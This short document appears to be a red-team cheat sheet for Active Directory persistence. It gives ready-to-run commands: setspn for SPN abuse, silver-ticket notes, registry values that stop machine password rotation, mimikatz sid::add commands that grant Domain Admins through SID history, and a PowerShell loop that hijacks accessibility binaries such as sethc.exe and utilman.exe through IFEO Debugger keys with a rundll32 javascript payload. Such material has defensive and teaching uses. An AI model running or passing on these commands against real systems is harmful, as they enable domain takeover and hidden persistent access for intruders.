Set a SPN on a user account to provide to regain password to account that was changed.
Example
setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname
- Create Silver Ticket
- Extend the lifetime past the default 30 days
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1
Stops the Netlogon service from changing a machine’s password
HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge
Set how often to rotate the local password (default 30 days)
Reference : https://adsecurity.org/?page_id=1821
mimikatz sid::patch
mimikatz sid::add /sam:karl.watkins /new:"Domain Admins"
mimikatz sid::add /sam:"Domain Users" /new:"Domain Admins"
IFEO Options
$bins = @("sethc.exe", "utilman.exe", "osk.exe", "Magnify.exe", "Narrator.exe", "DisplaySwitch.exe", "AtBroker.exe")
foreach($binname in $bins) {
New-Item -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname"
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$binname" -Name "Debugger" -Value 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("Follow @cptjesus on twitter")'
}